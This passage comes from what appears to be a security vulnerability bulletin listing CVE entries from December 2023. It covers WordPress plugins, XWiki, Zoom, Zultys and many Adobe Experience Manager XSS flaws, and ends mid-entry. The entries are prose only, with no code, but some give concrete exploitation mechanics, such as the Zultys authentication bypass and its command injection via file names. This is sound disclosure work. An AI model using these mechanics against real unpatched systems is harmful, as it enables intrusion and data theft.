The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.
[/TD]
[TD]
2023-12-16
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-6559
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
The E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'import_action' function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site's server which may make remote code execution possible.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.2
[/TD]
[TD]CVE-2023-6826
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'ajaxUploadFonts' function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-6827
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress

[/TD]
[TD]
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-6553
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress

[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aleksandar Uroševi? Stock Ticker allows Reflected XSS.This issue affects Stock Ticker: from n/a through 3.23.2.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2022-45365
[email protected][/TD]
[/TR]
[TR]
[TD]
wso2 -- wso2_api_manager
[/TD]
[TD]
Multiple WSO2 products have been identified as vulnerable to perform user impersonation using JIT provisioning. In order for this vulnerability to have any impact on your deployment, following conditions must be met: * An IDP configured for federated authentication and JIT provisioning enabled with the "Prompt for username, password and consent" option. * A service provider that uses the above IDP for federated authentication and has the "Assert identity using mapped local subject identifier" flag enabled. Attacker should have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP. When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
8.5
[/TD]
[TD]CVE-2023-6837
ed10eef1-636d-4fbe-9993-6890dfa878f8[/TD]
[/TR]
[TR]
[TD]
xorg-server -- xorg-server
[/TD]
[TD]
A flaw was found in xorg-server. A specially crafted request to RRChangeProviderProperty or RRChangeOutputProperty can trigger an integer overflow which may lead to a disclosure of sensitive information.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
7.6
[/TD]
[TD]CVE-2023-6478
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
xorg-server -- xorg-server
[/TD]
[TD]
A flaw was found in xorg-server. Querying or changing XKB button actions such as moving from a touchpad to a mouse can result in out-of-bounds memory reads and writes. This may allow local privilege escalation or possible remote code execution in cases where X11 forwarding is involved.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
7.8
[/TD]
[TD]CVE-2023-6377
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
xwiki -- xwiki-platform
[/TD]
[TD]
XWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn't properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user's profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be applied manually applied to the page XWiki.SearchAdmin.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
9.9
[/TD]
[TD]CVE-2023-50721
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
xwiki -- xwiki-platform
[/TD]
[TD]
XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn't require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document XWiki.ConfigurableClass.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
9.6
[/TD]
[TD]CVE-2023-50722
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
xwiki -- xwiki-platform
[/TD]
[TD]
XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the XWiki.ConfigurableClassMacros and XWiki.ConfigurableClass pages.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
9.9
[/TD]
[TD]CVE-2023-50723
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
xwiki -- xwiki-platform
[/TD]
[TD]
XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-50719
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
zammad -- zammad
[/TD]
[TD]
An issue was discovered in Zammad before 6.2.0. Due to lack of rate limiting in the "email address verification" feature, an attacker could send many requests for a known address to cause Denial Of Service (generation of many emails, which would also spam the victim).
[/TD]
[TD]
2023-12-10
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-50455
[email protected][/TD]
[/TR]
[TR]
[TD]
zoom -- multiple_products
[/TD]
[TD]
Improper access control in Zoom Mobile App for iOS and Zoom SDKs for iOS before version 5.16.5 may allow an authenticated user to conduct a disclosure of information via network access.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-43585
[email protected][/TD]
[/TR]
[TR]
[TD]
zoom -- multiple_products
[/TD]
[TD]
Path traversal in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom SDKs for Windows may allow an authenticated user to conduct an escalation of privilege via network access.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
7.3
[/TD]
[TD]CVE-2023-43586
[email protected][/TD]
[/TR]
[TR]
[TD]
zte -- mc801a
[/TD]
[TD]
There is a command injection vulnerability in some ZTE mobile internet products. Due to insufficient input validation of multiple network parameters, an authenticated attacker could use the vulnerability to execute arbitrary commands.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
8.4
[/TD]
[TD]CVE-2023-25643
[email protected][/TD]
[/TR]
[TR]
[TD]
zultys -- multiple_products
[/TD]
[TD]
A SQL injection vulnerability in Zultys MX-SE, MX-SE II, MX-E, MX-Virtual, MX250, and MX30 with firmware versions prior to 17.0.10 patch 17161 and 16.04 patch 16109 allows an authenticated attacker to execute arbitrary SQL queries on the backend database via the filter parameter in requests to the /newapi/ endpoint in the Zultys MX web interface.
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-43743
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
zultys -- mx-se_firmware
[/TD]
[TD]
An authentication bypass in Zultys MX-SE, MX-SE II, MX-E, MX-Virtual, MX250, and MX30 with firmware versions prior to 17.0.10 patch 17161 and 16.04 patch 16109 allows an unauthenticated attacker to obtain an administrative session via a protection mechanism failure in the authentication function. In normal operation, the Zultys MX Administrator Windows client connects to port 7505 and attempts authentication, submitting the administrator username and password to the server. Upon authentication failure, the server sends a login failure message prompting the client to disconnect. However, if the client ignores the failure message instead and attempts to continue, the server does not forcibly close the connection and processes all subsequent requests from the client as if authentication had been successful.
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-43742
[email protected][/TD]
[/TR]
[TR]
[TD]
zultys -- mx-se_firmware
[/TD]
[TD]
An OS command injection vulnerability in Zultys MX-SE, MX-SE II, MX-E, MX-Virtual, MX250, and MX30 with firmware versions prior to 17.0.10 patch 17161 and 16.04 patch 16109 allows an administrator to execute arbitrary OS commands via a file name parameter in a patch application function. The Zultys MX Administrator client has a "Patch Manager" section that allows administrators to apply patches to the device. The user supplied filename for the patch file is passed to a shell script without validation. Including bash command substitution characters in a patch file name results in execution of the provided command.
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
7.2
[/TD]
[TD]CVE-2023-43744
[email protected]
[email protected][/TD]
[/TR]

Back to top

Medium Vulnerabilities

Primary
Vendor -- Product Description Published CVSS Score Source & Patch Info
adobe -- after_effects
Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-48635
[email protected]
adobe -- css-tools
@adobe/css-tools versions 4.3.1 and earlier are affected by an Improper Input Validation vulnerability that could result in a denial of service while attempting to parse CSS.
2023-12-14
5.3
CVE-2023-48631
[email protected]
adobe -- dimension
Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-47061
[email protected]
adobe -- dimension
Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-47062
[email protected]
adobe -- dimension
Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-47078
[email protected]
adobe -- dimension
Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-47079
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-47064
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-47065
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48440
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Access Control vulnerability. An attacker could leverage this vulnerability to achieve a low-confidentiality impact within the application. Exploitation of this issue does not require user interaction.
2023-12-15
5.3
CVE-2023-48441
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48442
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48443
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48444
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48445
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48446
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48447
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48448
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48449
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48450
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48451
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48452
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48453
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48454
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48455
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48456
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48457
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48458
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48459
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48460
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48461
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48462
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48463
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48464
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48465
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48466
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48467
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48468
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48469
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48470
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48471
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48472
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48473
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48474
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48475
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48476
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48477
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48478
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48479
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48480
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48481
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48482
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48483
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48484
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48485
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48486
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48487
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48488
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48489
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48490
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48491
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48492
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48493
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48494
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48495
[email protected]
adobe -- experience_manager
